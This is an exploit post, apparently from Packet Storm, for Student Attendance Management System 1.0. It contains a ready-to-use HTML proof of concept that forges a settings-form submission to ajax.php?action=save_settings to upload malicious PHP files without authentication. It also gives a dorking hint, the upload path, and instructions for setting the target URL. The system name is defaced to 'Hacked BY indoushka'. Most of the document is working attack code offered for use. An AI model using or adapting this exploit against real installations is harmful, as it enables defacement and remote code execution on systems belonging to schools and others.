Share
## https://sploitus.com/exploit?id=PACKETSTORM:181295
=============================================================================================================================================  
| # Title : Student Attendance Management System 1.0 Remote File Upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This HTML page is designed to remotely upload PHP malicious files directly.  
  
[+] Line 84 set url of target.  
  
[+] The path to upload the files : http://127.0.0.1/student_attendance/assets/uploads/  
  
[+] Save Code as html :  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Manage Settings</title>  
<!-- Add your CSS links here -->  
<style>  
img#cimg {  
max-height: 10vh;  
max-width: 6vw;  
}  
</style>  
</head>  
<body>  
  
<div class="card col-lg-12">  
<div class="card-body">  
<form action="" id="manage-settings">  
<div class="form-group">  
<label for="name" class="control-label">System Name</label>  
<input type="text" class="form-control" id="name" name="name" value="Hacked BY indoushka" required>  
</div>  
<div class="form-group">  
<label for="email" class="control-label">Email</label>  
<input type="email" class="form-control" id="email" name="email" value="indoushka4ever@gmail.com" required>  
</div>  
<div class="form-group">  
<label for="contact" class="control-label">Contact</label>  
<input type="text" class="form-control" id="contact" name="contact" value="+213771818860" required>  
</div>  
<div class="form-group">  
<label for="about" class="control-label">About Content</label>  
<textarea name="about" id="about" class="text-jqte" rows="5"><p style="text-align: center; background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-weight: 400; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&rsquo;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p></p></textarea>  
</div>  
<div class="form-group">  
<label for="" class="control-label">Image</label>  
<input type="file" class="form-control" name="img" id="img" onchange="displayImg(this)">  
</div>  
<div class="form-group">  
<img src="assets/uploads/1603344720_1602738120_pngtree-purple-hd-business-banner-image_5493.jpg" alt="" id="cimg">  
</div>  
<center>  
<button type="submit" class="btn btn-info btn-primary btn-block col-md-2">Save</button>  
</center>  
</form>  
</div>  
</div>  
  
<script>  
function displayImg(input) {  
if (input.files && input.files[0]) {  
var reader = new FileReader();  
reader.onload = function (e) {  
document.getElementById('cimg').src = e.target.result;  
}  
reader.readAsDataURL(input.files[0]);  
}  
}  
  
function start_load() {  
// Implement your loading functionality here  
console.log("Loading started...");  
}  
  
function end_load() {  
// Implement your end loading functionality here  
console.log("Loading ended...");  
}  
  
function alert_toast(message, type) {  
// Implement your alert/toast notification here  
console.log(`${type}: ${message}`);  
}  
  
document.getElementById('manage-settings').addEventListener('submit', function(e) {  
e.preventDefault(); // Prevent the default form submission  
  
start_load(); // Start loading  
  
var form = e.target;  
var formData = new FormData(form);  
  
fetch('http://127.0.0.1/student_attendance/ajax.php?action=save_settings', {  
method: 'POST',  
body: formData  
})  
.then(response => response.text())  
.then(resp => {  
if (resp == 1) {  
alert_toast('Data successfully saved.', 'success');  
setTimeout(function() {  
location.reload(); // Reload the page after saving  
}, 1000);  
} else {  
// Handle error case if needed  
console.log('Error:', resp);  
}  
end_load(); // End loading  
})  
.catch(error => {  
console.error('Error:', error);  
end_load(); // End loading  
});  
});  
</script>  
  
</body>  
</html>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================